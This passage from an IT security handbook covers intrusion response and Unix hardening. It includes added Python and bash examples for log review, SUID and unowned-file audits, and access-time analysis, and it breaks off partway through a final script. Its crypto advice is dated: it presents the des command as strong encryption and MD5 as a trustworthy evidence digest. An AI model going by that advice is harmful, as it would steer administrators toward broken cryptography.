In addition to having a plan of action, you can be prepared by creating a toolkit on read-only media (floppy, CD, etc.). This toolkit will give you a set of programs for incident response that you know are not compromised. Include programs that you will need to examine a compromised system. For a Unix system, these might include: awk, bash, cat, compress, cut, dd, des, df, du, file, find, grep, gzip, icat, ifconfig, last, ls, lsmod, lsof, md5sum, modinfo, more, netcat, netstat, nmap, paste, pcat, perl, pgp, pkginfo, ps, rpm, rm, script, sed, strings, strace, tar, top, truss, uncompress, vi, and w. Don't forget shared libraries (or insure that the programs are statically linked). Having a bootable live filesystem on your CD or DVD is useful as well. One particularly handy toolkit is Knoppix (http://www.knoppix.org), a bootable live Linux CD that includes a myriad of analysis and forensics tools. Because Linux can mount Microsoft FAT file systems and other Unix file systems, a Knoppix CD makes an excellent general forensic toolkit.

Discovering an Intruder

There are several ways you might discover a break-in:

· Catching the perpetrator in the act. For example, you might see the superuser logged in from a cyber-cafe in Budapest when you are the only person who should know the superuser password.

· Deducing that a break-in has taken place based on changes that have been made to the system. For example, you might receive an electronic mail message from an attacker taunting you about a security hole, you may discover new accounts, or your network connection might be running very slowly because the bandwidth is being used by people downloading copyrighted software.
· A message from a system administrator at another site indicating strange activity at his or her site that has originated from an account on your machine.

· Strange activities on the system, such as system crashes, significant hard disk activity, unexplained reboots, minor accounting discrepancies, or sluggish response when it is not expected.

There are a variety of programs that you can use to check files and processes that might lead you to discover a break-in. Use these tools on a regular basis, but use them sporadically as well. This introduces an element of randomness that can keep perpetrators from being able to cover their tracks. This principle is a standard of operations security: try to be unpredictable.

What to Do When You Catch Somebody

You have a number of choices when you discover an intruder on your system:

1. Ignore them -- they might go away. This is generally a poor choice. Ignoring an intruder who is on your system essentially gives him free rein to do harm to you, your users, and others on the network. You may also put yourself at risk for downstream liability if the intruder causes damages at another organization and you had the chance to stop him.

2. Try to contact them, and ask them what they want. Be extremely careful if you pursue this course of action. Some intruders are malicious in intent, or extremely paranoid about being caught. If you contact them, they may react by trying to delete everything on your computer so as to hide their activities. Trace the intruder before you contact them, and document every contact.

3. Monitor the intruder. This will give you an idea of whether the intruder is modifying your accounting database or simply rummaging around through your users' e-mail. However, keep in mind that you don't know how long this intruder has been on your system, so all you can really monitor is what is done next.
If the intruder is logged in over a network connection, you can use a packet monitor such as tcpdump, ethereal, or snoop to either display the user's packets or record them in a file. If your computer is attached to a hub, another computer on the same network may be able to capture packets unobtrusively. If your intruder is logged on through a modem or serial port that is connected directly to your computer, there are several programs that you can use to monitor the intruder's actions, including ttywatch, conserver, rtty, and ser2net. These programs can give you a detailed, byte-by-byte account of the information that is sent over one or more serial ports. In many cases, they can also monitor pseudo-ttys, which is valuable when the attacker has connected over the network using an encrypted protocol such as SSH. In some countries, monitoring an intruder may be illegal, or may only be legal if you have a banner telling all users that they may be monitored.

4. Try to trace the connection and identify the intruder. If the intruder has called your computer by telephone, your options will depend on the services offered by your telephone company; some offer a caller id service or caller tracing services. If the intruder has logged in over the network, the who or netstat commands may quickly identify the computer that originated the connection. You can then contact the system administrator of the remote machine (by telephone!) for further tracing; administrator contact information can often be found in the whois registry for their domain name, or on the organization's web site. Another option is to use a traceroute program (traceroute or tracert.exe) to identify the network provider for the remote machine.
If all else fails, you might send e-mail to root or postmaster at the remote machine asking them to call you; don't mention the break-in, however, as the intruder may be monitoring that account.

5. Break their connection by killing their processes, unplugging the modem or network, or turning off your computer. Killing your computer's power--turning it off--is the very quickest way to get an intruder off your computer and prevent him from doing anything else--including possibly further damage. Unfortunately, this is a drastic action. Not only does it stop the intruder, but it also interrupts the work of all of your legitimate users. It may also delete evidence you might need in court some day, delete necessary evidence of the break-in, such as running processes, and cause the system to be damaged when you reboot because of Trojaned startup scripts. In addition, many file systems do not deal with sudden power loss very gracefully: pulling the plug might do significantly more damage than the intruder might ever do. On Unix systems, you can use the ps command to get a list of the intruder's processes and the kill command to stop them, after you change the password on the account that the intruder is using. On Windows systems, the Task Manager serves these functions. If the intruder is connecting over a network, you can break that network connection by programming your firewall or router to drop packets from the user's host, or unplug the network connector altogether; if the intruder has dialed in over a telephone line, you can turn off the modem--or unplug it from the back of the computer.

6. Contact your Internet Service Provider, an incident response team, or law enforcement official to notify them of the attack.

After the Attack

The remainder of this chapter discusses in detail how to find out what an intruder may have done and how you should clean up afterwards.
Analyzing the Log Files

Even if you don't catch an intruder in the act, you still have a good chance of finding the intruder's tracks by routinely looking through the system logs. Look for things out of the ordinary; for example:

· Users logging in at strange hours
· Unexplained reboots
· Unexplained changes to the system clock
· Unusual error messages from the mailer, ftp daemon, or other network server
· Failed login attempts with bad passwords
· Unauthorized or suspicious use of the su command
· Users logging in from unfamiliar sites on the network

On the other hand, if the intruder is sufficiently skillful and achieves superuser access on your machine, he or she may erase all evidence of the invasion. Simply because your system has no record of an intrusion in the log files, you can't assume that your system hasn't been attacked. Many intruders operate with little finesse: instead of carefully editing out a record of their attacks, they simply delete or corrupt the entire log file. This means that if you discover a log file deleted or containing corrupted information, there is a possibility that the computer has been successfully broken into. However, a break-in is not the only possible conclusion. Missing or corrupted logs might mean that one of your system administrators was careless; there might even be an automatic program in your system that erases the log files at periodic intervals. You may also discover that your system has been attacked if you notice unauthorized changes in system programs or in an individual user's files. This is another good reason for using a file integrity tool to monitor your files for changes. If your system logs to a hardcopy terminal or another computer, you may wish to examine that log first, because you know that it can't have been surreptitiously modified by an attacker coming in by the telephone or network.
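Several of the checks listed above can be automated. As an added example (not the handbook's code), the following Python routine applies four of them to constructed sshd and su log lines: successful logins outside working hours, logins from sources not on a known list, su to root, and repeated failed passwords from one source. The message formats, rule names, thresholds and sample lines are this example's own assumptions:

```python
import re
from collections import Counter

# BSD-style syslog header plus message; the program may or may not carry a [pid].
LINE_RE = re.compile(
    r'^\w{3} +\d+ (?P<hh>\d\d):\d\d:\d\d (?P<host>\S+) '
    r'(?P<prog>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$')
# OpenSSH-style messages (assumed formats for this example).
ACCEPTED_RE = re.compile(r'^Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)')
FAILED_RE = re.compile(r'^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)')
# BSD-style su record: "(to root) george on pts/0" (assumed format).
SU_RE = re.compile(r'^\(to (?P<target>\S+)\) (?P<user>\S+) on (?P<tty>\S+)')


def analyze_logins(lines, known_sources, work_hours=(7, 19), fail_threshold=3):
    """Return (rule, detail) findings for a few of the indicators the handbook lists.

    work_hours is a half-open [start, end) range of hours; successful logins
    outside it are reported.  Failed passwords are counted per source and
    reported once the count reaches fail_threshold."""
    findings = []
    failures = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        hour, prog, msg = int(m.group('hh')), m.group('prog'), m.group('msg')
        if prog == 'sshd':
            ok = ACCEPTED_RE.match(msg)
            if ok:
                user, src = ok.group('user'), ok.group('src')
                if not (work_hours[0] <= hour < work_hours[1]):
                    findings.append(('login-odd-hours', f'{user} from {src} at {hour:02d}h'))
                if src not in known_sources:
                    findings.append(('login-unfamiliar-source', f'{user} from {src}'))
                continue
            failed = FAILED_RE.match(msg)
            if failed:
                failures[failed.group('src')] += 1
        elif prog == 'su':
            su = SU_RE.match(msg)
            if su and su.group('target') == 'root':
                findings.append(('su-to-root', f"{su.group('user')} on {su.group('tty')}"))
    for src, count in failures.items():
        if count >= fail_threshold:
            findings.append(('repeated-failed-logins', f'{count} failures from {src}'))
    return findings


# Constructed sample (not from a real system); 192.0.2.10 is the only
# source this fictitious site expects interactive logins from.
KNOWN_SOURCES = {'192.0.2.10'}
SAMPLE_LINES = """\
Aug 14 03:12:07 r2 sshd[2201]: Accepted password for root from 203.0.113.5 port 4412 ssh2
Aug 14 09:05:11 r2 sshd[2240]: Accepted publickey for george from 192.0.2.10 port 50122 ssh2
Aug 14 09:06:40 r2 su: (to root) george on pts/0
Aug 14 21:40:01 r2 sshd[2310]: Failed password for invalid user admin from 198.51.100.9 port 3391 ssh2
Aug 14 21:40:04 r2 sshd[2311]: Failed password for invalid user oracle from 198.51.100.9 port 3392 ssh2
Aug 14 21:40:08 r2 sshd[2312]: Failed password for root from 198.51.100.9 port 3393 ssh2
Aug 14 22:15:30 r2 sshd[2320]: Accepted password for jhalonen from 192.0.2.10 port 50200 ssh2
""".splitlines()

if __name__ == '__main__':
    for rule, detail in analyze_logins(SAMPLE_LINES, KNOWN_SOURCES):
        print(f'{rule:25} {detail}')
```

The su finding is reported regardless of who did it; whether george is entitled to become root is for the reviewer to decide, which is the point of the handbook's wording "unauthorized or suspicious use".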
Preserving the Evidence

If you wish to prosecute your attacker (if you ever find the person) or sue them for damages, you will need to preserve some evidence that a crime has been committed. Even if you do not wish to take any legal action, you may find it useful to collect evidence of the attack so that you have the ability to reconstruct what happened. There are many approaches to gathering evidence. Here are some approaches that we have found successful:

1. Capture the data in the system's memory. On Unix, you can use the dd command:
   # dd bs=1024 < /dev/mem > mem.image
   # dd bs=1024 < /dev/kmem > kmem.image

2. Make a complete copy of the computer's disk drives. Now remove the original disks, place them in a vault, and work with the copies on another machine. If your system uses the /proc filesystem, the copied /proc may be of particular interest.

3. Copy key files that were left or modified by the intruder into an archive. Make a copy of this archive on several computers.

4. Write modified files to CDR or DVD-RAM media.

5. Run arp -a or arp -v to print the contents of the ARP table, which may suggest network connections that have been recently established.

6. If your web site was defaced, save the HTML pages on your computer's hard drive. Use a screen capture utility to record a copy of how the image looked on your computer's screen.

7. Take copies of displays that might reflect the current state of the compromised system. X-Windows systems can use xwd for this purpose; Microsoft Windows systems can use the PrtSc key.

8. Compute the MD5 digest of any images or files that you recover. Print the MD5 on a piece of paper, sign it, date it, and put it in your incident log book. You can use this MD5 at a later point in time to establish that the evidence has not been altered.
There are commercial products that you may find useful to assist you in preserving evidence, including high-speed disk duplicators and network forensics analysis tools (NFATs) that record all packets entering and leaving an organization. If you have involved law enforcement authorities, speak with them before attempting to preserve any evidence on your own.

Cleaning Up After the Intruder

If your intruder gained superuser or administrator access, or access to another privileged account such as mail, he may have modified your system to make it easier for him to break in again in the future. If the intruder has installed a password sniffer or stolen the password file, he'll potentially have access to a legitimate account and will be able to get back in no matter what other precautions are taken. You'll have to change all of the passwords on the system. After a successful break-in, you must perform a careful audit to determine the extent of the damage. Depending on the nature of the break-in, you'll have to examine your entire system. You may also need to examine other systems on your local network, or possibly the entire network (including routers and other network devices). An intruder can compromise a system in many ways that can be difficult or impossible to detect. The safest course of action is to reinstall the operating system from scratch, apply all security patches, reinstall application programs from scratch (along with their patches) and then carefully restore user files from backups, or, if necessary, the compromised disks. Here are some particularly common things to watch for in your audit:

New Accounts
After a break-in, scan for newly created accounts. Delete any accounts that have been created by an intruder. You may wish to make a paper record of each account before deleting it in case you wish to prosecute the intruder (assuming that you ever find the villain).
Changes in file contents or permissions
An intruder who gains privileges can change any file on your system. Although you should make a thorough inventory of your computer's entire filesystem, you should look specifically for any changes to the system that affect security. For example, an intruder may have inserted trap doors or logic bombs to do damage at a later point in time. A clean copy of a file integrity checker and a known good backup of its database are invaluable.

New SUID and SGID files
Intruders who gain superuser access frequently create SUID and SGID files when the system supports them. After a break-in, scan your system to make sure that new SUID files have not been created. (PUIS, 151-154)

Changes in network access files
An intruder may have created or changed files to allow remote access in the future. For example, under Unix, the intruder may create new .rhosts or .ssh/authorized_keys files in your users' home directories, or added machines to the system-wide /etc/hosts.equiv file. Check all of these files and ask users to do the same. (PUIS, 705-706)

Changes to startup files
An intruder may have modified the contents of user or system-wide startup files, or files that may be automatically run at scheduled times or when triggered by certain events (like automatically forwarding an e-mail message). All these files need to be carefully checked.

Changes to configuration files
Any service that runs as a privileged user and reads a configuration file may be vulnerable to changes made to that configuration file. The Windows Registry is the epitome of vulnerable configuration files. All configuration files for services should be checked against known good copies or cryptographic signatures.

Hidden files and directories
The intruder may have created "hidden directories" on your computer, and may be using them as a repository for stolen information or for programs that break security.
Intruders often hide their files in directories with names that are a little difficult to discover or enter on the command line. This way, a novice system administrator who discovers the hidden directory will be unlikely to figure out how to access its contents. Filenames that are difficult to discover or enter include ".. " (dot dot space), and names containing control characters, backspaces, or other special characters. Some names can be entered in Unicode that display as familiar alphabetic characters but that cannot be entered easily from the keyboard. Another approach is to use filenames that sound like they are obscure parts of the operating system that should not be tampered with (file systems that have "system" attributes for directories are particularly vulnerable to this approach).

Unowned files
Sometimes attackers leave files in the filesystem that are not owned by any user or group. This can happen if the attacker created an account and some files, and then deleted the account--leaving the files. Alternatively, the attacker might have been modifying the raw data on a disk and changed a UID by accident.

New network services
Many intruders (and many attack scripts) will install network daemons that provide backdoor access to the compromised host at a later time, or can be used to direct the host to act as a zombie in attacks against other hosts. Although these new services can sometimes be detected by the output of system commands on the compromised host, those commands are also frequently modified. You may be able to detect new daemons using nmap or another port scanning tool from an uncompromised machine on the same network. (Of course, it's always safest to disconnect a compromised machine from your network while you're investigating it.) You may also need to sweep the entire filesystem and observe what files and directories were accessed around the time of the intrusion. This may give you some clues as to what was done.
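The checks for new SUID/SGID files, oddly named hidden directories and unowned files described above can be scripted. As an added example (not the handbook's code), the Python routine below walks a directory tree without following symbolic links and reports each of those conditions. The naming heuristics are this example's own, and the sample tree it builds in a temporary directory is constructed for illustration only:

```python
import os
import pwd
import stat
import tempfile


def suspicious_name(name):
    """Return why a file name looks designed to be hard to see or type, or None."""
    if name != name.strip():
        return 'leading or trailing whitespace (e.g. ".. ")'
    if any(ord(c) < 32 or ord(c) == 127 for c in name):
        return 'control character'
    if set(name) <= set('. '):
        return 'only dots and spaces'
    if any(ord(c) > 127 for c in name):
        return 'non-ASCII character (possible look-alike of a familiar name)'
    return None


def audit_tree(root, known_uids=None):
    """Walk root (not following symlinks) and return (kind, path, detail) findings.

    Kinds: 'suspicious-name', 'setuid-or-setgid' (regular files only) and
    'unowned' (owner uid not in known_uids, which defaults to the accounts
    currently present in the password database)."""
    if known_uids is None:
        known_uids = {entry.pw_uid for entry in pwd.getpwall()}
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            reason = suspicious_name(name)
            if reason:
                findings.append(('suspicious-name', path, reason))
            st = os.lstat(path)   # lstat: do not follow links, do not open the file
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(('setuid-or-setgid', path, oct(stat.S_IMODE(st.st_mode))))
            if st.st_uid not in known_uids:
                findings.append(('unowned', path, f'uid {st.st_uid}'))
    return findings


def build_sample_tree():
    """Constructed sample (not a real compromised system): a '.. ' directory
    holding a setuid shell script, plus an ordinary file.  Returns the root
    and the uid that owns everything in it."""
    root = tempfile.mkdtemp(prefix='audit-sample-')
    os.mkdir(os.path.join(root, '.. '))
    shell = os.path.join(root, '.. ', 'sh')
    with open(shell, 'w') as f:
        f.write('#!/bin/sh\n')
    os.chmod(shell, 0o4755)          # setuid bit set, as an intruder's leftover might be
    with open(os.path.join(root, 'notes.txt'), 'w') as f:
        f.write('ordinary file\n')
    return root, os.getuid()


if __name__ == '__main__':
    root, uid = build_sample_tree()
    for kind, path, detail in audit_tree(root, known_uids={uid}):
        print(f'{kind:18} {path!r:50} {detail}')
```

Run it against a disk image mounted read-only rather than the live compromised system, for the reasons given in the next section; lstat reads the inode without opening the file, so the scan itself leaves access times as they were.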
For instance, if your compiler, loader, and libraries all show access times within a few seconds of each other, you can conclude that the intruder compiled something. If you open files to search for changes, the time of last access on those files will change. Therefore, you will be unable to detect patterns of access. For this reason, we suggest that you conduct your forensics on a copy of your disks, mounted read-only. If you don't have the hardware to make a copy, many systems will allow you to remount live partitions read-only (possibly through a loopback interface). Do your forensics on the copy. But realize that simply executing commands on this setup will likely change their access times, and the access times of any shared libraries and configuration files (unless you remount every partition)! Thus, your best bet may be to mount the disks read-only on another system, and do your checking from there.

Never Trust Anything Except Hardcopy

If your system is compromised, don't trust anything that is on its disks. If you discover changes in files on your system that seem suspicious, don't believe anything that your system tells you, because a good system cracker can change anything on the computer. The attacker can compile and install new versions of any system program--so there might be changes, but your standard utilities might not tell you about them. The attacker can patch the kernel that the computer is running, possibly disabling security features that you have previously enabled. The attacker can even open the raw disk devices for reading and writing. Often, they don't need (or have) great skill. Instead, they have access to rootkits put together by others with more skill.
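To illustrate the access-time reasoning above, here is an added Python example (not from the handbook) that reads access times with os.lstat, which inspects the inode without opening the file and so does not itself update atime, and groups files whose access times fall within a few seconds of one another. The sample files and their timestamps are constructed with os.utime purely for the demonstration:

```python
import os
import tempfile


def access_clusters(paths, window_seconds=5):
    """Group paths whose last-access times lie within window_seconds of the
    previous file in time order.  Uses os.lstat, which does not open the
    file and therefore does not change the access time being examined."""
    records = sorted((os.lstat(p).st_atime, p) for p in paths)
    clusters, current = [], []
    for atime, path in records:
        if current and atime - current[-1][0] > window_seconds:
            clusters.append([p for _, p in current])
            current = []
        current.append((atime, path))
    if current:
        clusters.append([p for _, p in current])
    return clusters


def build_sample_files():
    """Constructed sample: a compiler, loader and C library 'used' within three
    seconds, and an unrelated file accessed an hour later.  Returns {name: path}."""
    root = tempfile.mkdtemp(prefix='atime-sample-')
    base = 1_000_000_000.0   # arbitrary epoch seconds; only the differences matter
    schedule = {'cc1': base, 'ld': base + 2, 'libc.so.6': base + 3, 'passwd': base + 3600}
    paths = {}
    for name, atime in schedule.items():
        path = os.path.join(root, name)
        with open(path, 'w') as f:
            f.write(name + '\n')
        os.utime(path, (atime, atime))   # set atime and mtime explicitly
        paths[name] = path
    return paths


if __name__ == '__main__':
    sample = build_sample_files()
    for cluster in access_clusters(sample.values()):
        if len(cluster) > 1:
            print('accessed together:', [os.path.basename(p) for p in cluster])
```

On a real image the candidate paths would come from a directory walk of the read-only copy; the clustering is only meaningful if nothing, including your own tools, has opened the files since the intrusion.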
Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 339

The only limit to the powers of an attacker who has gained superuser status is that the attacker cannot change something that has been indelibly printed on a piece of paper to which the attacker does not have access. For this reason, if you have a logging facility that logs whenever the date is changed, you might consider having the log made to a hardcopy terminal or to another computer. Then, be sure to examine this log on a regular basis.

To further protect yourself, you should have a bootable copy of your operating system on a zip disk, CD-ROM, or other removable storage device. This gives you a way of booting and examining your system with a set of tools that are known to be uncorrupted. Coupled with a database of message digests of unmodified files [245], you should be able to find anything important that was modified on your system -- provided that your message digests were generated from uncorrupted versions of your software. Remember that you cannot necessarily trust your backups, as you don't know when the intrusion started: use distribution media if possible.

The next step is to get a printed copy of all of the necessary logs that you may have available (e.g., console logs and printed copies of network logs), and to examine these logs to try to get an idea of what the unauthorized intruder has done. You will also want to see if anything unusual has happened on the system since the time the intruder logged in. These logs may give you a hint as to what programs the intruder was running and what actions the intruder took. Be sure to initial and timestamp these printouts.

Keep in mind that the time you discover a break-in is not necessarily the same time as when it started! In one incident, there was evidence that the actual intrusion had occurred two years before! There were no backups or copies of software on the system that could be trusted.
In fact, the intruders had been making wholesale changes to the system during all that time ... installing patches and upgrades! They were doing a better job of administration than the person charged with managing the machine.

Resuming Operation

The next step in handling a break-in is to restore the system to a working state. How quickly you must be back in operation, and what you intend to do about the break-in over the long term, will determine when and how you perform this step. At a minimum, you want to get whatever assurance you can that you have restored anything damaged on the system, and fixed whatever it was that allowed the intruder in. Then, if you have been keeping good backups, you can restore the system to a working state.

Determining what failed and allowed an intruder in is complicated by the fact that there is usually little data in the logs to show what happened, and there are few things you can execute to reverse-engineer the break-in. Most break-ins seem to result from either bugs or, less commonly, compromised user passwords (suspect this especially if you find that the intruders have installed a sniffer on your system). If the break-in was the result of a bug, you may have difficulty determining what it is, especially if it is a new one that has not been widely exploited. Here are some things to try:

1. If you have been recording your network traffic, examine your analysis system to see if any of the traffic is odd or unexplained.
2. Examine your log files looking for unusual entries, unusual patterns of activity, or evidence that programs have crashed.
3. If you know the specific IP address that the attacker used as the source of the attack, search through all of your log files for records of that IP address.

[245] You can use Tripwire to produce such a database, or you can develop your own software.
If you suspect that it is a bug in some system software, you can try contacting your vendor to see if you can get some assistance there. In most cases it helps if you have a maintenance contract or are a major customer. You might consult recent postings to the security groups on web sites or mailing lists. Often, current vulnerabilities are discussed at these locations in great detail. Sometimes, however, these sites contain incorrect information and even dangerous advice. Therefore, be very wary of what you read.

Finally, you may wish to contact a FIRST team appropriate for your site. Teams in FIRST often have some insight into current break-ins, largely because they see so many reports of them. Contacting a representative from one of the teams may result in some good advice for things to check before you put your system back into operation. However, many teams have rules of operation that prevent them from giving too much explicit information about active vulnerabilities until the appropriate vendors have announced a fix. Thus, you may not be able to get complete information from this source.

Damage Control

If you've already restored the system, what damage is there to control? Well, the aftermath, primarily. You need to follow through on any untoward consequences of the break-in. For instance, was proprietary information copied? If so, you need to notify your legal counsel and consider what to do. You should determine which of the following concerns need to be addressed:

1. Do you need to file a formal report with law enforcement, a regulatory agency, an insurance company, or your vendor?
2. Do you need to institute disciplinary or dismissal actions against one or more employees? Do you need to update employee training to forestall any future incidents of this type?
3. Do you need to update your disaster recovery plan to account for changes or experiences in this instance?
4.
Do you need to investigate and fix the software or configuration of any other systems under your control, or at any affiliated sites?
5. Do you need to have your public relations office issue a formal report (inside or outside) about this incident?

The answers to the above questions will vary from situation to situation and incident to incident.

CHAPTER 10. SYSTEM-SPECIFIC GUIDELINES

At a Glance

Most of this handbook applies no matter what kind of hardware and operating systems you're running. This chapter discusses some technical recommendations that are specific to Unix/Linux, Microsoft Windows, and MacOS 7-9 operating systems (MacOS X is covered by the Unix material).

Unix and Unix-like Operating Systems [246]

Traditionally, Unix-based systems were deployed in large-scale multiuser time-sharing environments, or as clusters of workstations with networked filesystems. Today, Unix-based systems are increasingly used as single-user workstations or servers. Because there have been so many different versions of Unix-like operating systems, many security mechanisms are vendor-specific. It's particularly important to read all of the manuals for your vendor's version of Unix. Several good books, web sites, and mailing lists devoted to Unix security are listed in Annexes 2-5.

Users, Groups, and the Superuser

Much of Unix's security relies on the separation of users and user groups. All files and processes have an associated effective user and group id that determines what privileges they have. Two users should never share the same account or user ids; instead, assign individual accounts and use groups to share file access rights among users. On Unix-like systems, the user root (uid 0) is the superuser and usually has the ability to modify every aspect of the system. Accordingly, protecting the root account and processes that run with root privileges is a critical aspect of Unix security.
Avoid using the root account for routine activities, and disable logins by root. When you must use root, use the su command (or a variation like sudo) to change from your normal user account to root. This both creates accountability through logging and requires that an attacker subvert two accounts to gain superuser access. Obviously, it behooves you to limit access to commands like su; on some systems, only users in the wheel group can use su.

Some Unix kernels support the ability to limit what even root can do while the system is running in its normal mode, through the use of kernel security levels or capabilities. Check your vendor's documentation to determine if these limits are available in your version, and take advantage of them if they are.

If you have particularly sensitive data files, you may wish to keep them encrypted and on removable media to guard against their exposure in the event that the root account is compromised. Note, however, that encryption is not sufficient if the decryption program resides on the same system, as an attacker with superuser access can modify the decryption program to save a copy of the decrypted file.

Filesystems and Security

Files in Unix are assigned an owner and a group, and the chmod command is used to specify what the owner, members of the file's group, and everyone else can do to the file. These file permissions include the ability to read the file's contents, write to the file, and execute the file as a program. Permissions on directories are used to control who can examine files in the directory and who can add or remove files from a directory.

[246] Throughout this section, we will be referring to Unix and Unix-based systems interchangeably. Although the term "Unix" will appear in this text most often, the information is applicable to Linux and other variants on Unix.
Learn how to use chown, chgrp, and chmod to control access to files, and ls to list important file access information. Each Unix user has a umask value that determines the default permissions for files and directories they create. Use the umask command in login scripts to insure that users have an appropriate umask value. The value 027 allows only others in the user's group to read and execute, but not modify, files. The value 077 denies any access to anyone but the user themselves.

Some Unix systems support more fine-grained access control lists (ACLs) for files. ACLs can grant or deny permission for individual users to read, write, or execute files. If your system supports ACLs, learn how to use them.

Some Unix systems support immutable and append-only attributes on files. An immutable file can't be altered, even by root, unless the system is booted in a special low-security mode from the console. An append-only file can only be added to, and not otherwise modified or deleted; log files are good candidates for append-only attributes. If your system provides these, take advantage of them.

Unix files with the setuid (SUID) permission run with the effective user id of their owner, rather than of the user who executes them. SUID files allow one user to execute commands that require the privileges of another (often root); as such, they represent a potential vulnerability. Setgid (SGID) files run with the effective group id of their group, rather than that of the user who executes them. You should periodically scan your system for SUID/SGID files and make sure that you know why they have those permissions. Keep a list of these files printed out. Avoid writing SUID/SGID programs yourself; never write SUID/SGID shell scripts. Some filesystems can be mounted with a nosuid option that prevents SUID/SGID permissions from functioning; it's a good idea to mount user home directories and other non-system partitions with this option.

Unix represents devices as files.
For example, printers, serial ports, hard drives, and even the system's memory are accessible through device files. Although device files are generally found in the /dev directory, they can be created anywhere by a user with appropriate (usually superuser) privileges. If an unauthorized user can read your system memory, they can access sensitive information of other users; if they can write to your system memory, they can compromise the system. The same caution applies to raw disk devices and several other kinds of devices. Scan for device files on your system and insure that they have appropriate ownership and permissions. If your filesystems can be mounted with a nodev option, consider using that. On some systems, a file called logindevperm or fbtab controls how device permissions are modified when a user logs in at the console (to prevent, for example, remote users from turning on the microphone and monitoring the room). If you have this file, check to be sure it's properly set up.

Encryption

Several Unix commands seem to obfuscate data but are ineffective as encryption. Don't use rot13 or the crypt command, as they are trivial to break. Many systems provide strong encryption through a des command, or through the openssl application and libraries. Similarly, don't rely on the sum command for cryptographically strong checksums. Instead use md5, md5sum, or openssl to generate cryptographic message digests.

TCP/IP Networking

Unix systems are often used for network applications and services. Many network services are started by the inetd (or xinetd) daemon. Examine the configuration file(s) used by this daemon and disable any services that you do not need; protect other services with the TCP wrapper daemon tcpd, unless your inetd has built-in support for TCP wrappers.
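The three periodic filesystem checks recommended above, for unowned files, SUID/SGID files and device nodes outside /dev, as one added shell script that is not from the handbook; it assumes POSIX find and GNU stat, and the baseline file name is an assumption:

```bash
#!/bin/bash
# Added example, not from the handbook: periodic audit of the three file
# classes discussed above, with a baseline-and-compare step for SUID/SGID
# files so that a printed list taken from a known-good state can be checked
# against the current system. Assumes POSIX find and GNU stat.

# find_unowned ROOT: files with no matching user or group, as left behind by
# a deleted account or by hand-edited disk data.
find_unowned() {
    find "$1" -xdev \( -nouser -o -nogroup \) -print 2>/dev/null | sort
}

# find_setid ROOT: SUID/SGID files as "mode owner group path", sorted so the
# output can be saved as a baseline and compared later.
find_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%A %U %G %n' {} + 2>/dev/null | sort
}

# find_stray_devices ROOT: block or character device nodes anywhere except
# under ROOT/dev (a device file elsewhere is almost never legitimate).
find_stray_devices() {
    find "$1" -xdev \( -type b -o -type c \) ! -path "${1%/}/dev/*" \
        -print 2>/dev/null | sort
}

# compare_setid BASELINE_FILE ROOT: lines in the current SUID/SGID list that
# are not in the baseline, i.e. new files or changed mode or ownership.
compare_setid() {
    find_setid "$2" | comm -13 "$1" -
}

# Usage: ./fs_audit.sh / > setid.baseline    (first run, on a clean system)
#        ./fs_audit.sh / setid.baseline      (later runs print the changes)
if [ "$#" -eq 1 ]; then
    find_setid "$1"
elif [ "$#" -eq 2 ]; then
    compare_setid "$2" "$1"
fi
```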
Other network services are started at system boot by files in the /etc/init.d or /etc/rc*.d directories or in the files /etc/rc and /etc/rc.local. Disable any services that you do not use. Pay particular attention to services that may provide outsiders with information about your system or its users, such as fingerd.

Every Unix system should run its own host-based packet-filtering firewall. Consult vendor documentation to determine if your system has a firewall and how to use it. Typical firewall configuration tools include ipfw, ipchains, and iptables. These firewalls should be configured to block all packets by default, and to allow only packets destined for services you intend to provide. An external firewall should be used to prevent outsiders from accessing several protocols and services that might be offered by hosts in your organization (e.g., SNMP, NFS, NTP, LPD, Samba, RIP). Use static routing whenever possible.

Traditionally, several standard services depended on authentication by the hostname or IP address of the client, or by passwords sent in plaintext over the network connection. Neither of these approaches is secure. Instead, applications should use cryptographic approaches to authentication, with either shared or public key systems. Many applications (telnet, rlogin, rcp, rsh, ftp) can be disabled and replaced with Secure Shell (ssh), which provides strong authentication. Do so, and remove any .rhosts or /etc/hosts.equiv entries that list IP addresses of trusted machines. Other services (pop, imap, http, ldap) should be compiled with the OpenSSL libraries to provide SSL/TLS connections to clients so that passwords are not transmitted unencrypted.

When possible, run network services as non-root users.
Many network daemons can be configured to start up as root (in order to bind to a network port lower than 1024, which requires root privileges on most Unix systems), and then give up their privileges and change to a non-root user. Give each daemon its own non-root account to use, rather than sharing a single ("nobody") account. When possible, run network services in a chroot jail environment to limit the damage possible if they are compromised.

If you run anonymous FTP services, use an up-to-date version of the FTP daemon. Don't provide your real /etc/passwd file in the FTP area. Make sure that /etc/ftpusers, the list of users who cannot connect by FTP, includes at least root, uucp, bin, and any other account that does not belong to an actual human being. Be paranoid about the directory permissions and ownership in the FTP area; configure "incoming" directories to prevent downloads and "outgoing" directories to prevent uploads. Scan your FTP logs regularly.

If possible, use postfix, exim, or qmail instead of sendmail on mail servers. Never use anything but the latest version of your MTA. Use mail aliases to insure that mail to any valid non-user account is delivered to a real user; in particular, be sure that mail can be delivered to root, postmaster, and abuse addresses. Protect the mail aliases file from changes by unauthorized individuals. If you have mail aliases that deliver mail to programs or files, examine them carefully and delete them if possible.

Do run the authd/identd daemon if you have multiuser machines. This can help you if you receive a report of someone at your system attacking another system. Use a version that returns encrypted identifiers to avoid exposing user information to outside systems.

If you don't use RPC, disable the portmapper daemon; if you do, restrict access to it and use the securenets feature if it's available. Disable any RPC services provided by inetd that you don't use (and rexd in particular).
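The inetd configuration review recommended above (disable unneeded services, wrap the rest with tcpd, and drop rexd and the other services the text says to replace with ssh or SSL), as an added shell example that is not the handbook's own; the inetd.conf sample inside it is constructed, and the list of "risky" service names is taken from the text:

```bash
#!/bin/bash
# Added example, not from the handbook: review an inetd.conf as the text
# recommends, listing each enabled service, whether it runs behind the TCP
# wrapper (tcpd), and whether it is one of the services the handbook says to
# disable or replace. The sample configuration is constructed for
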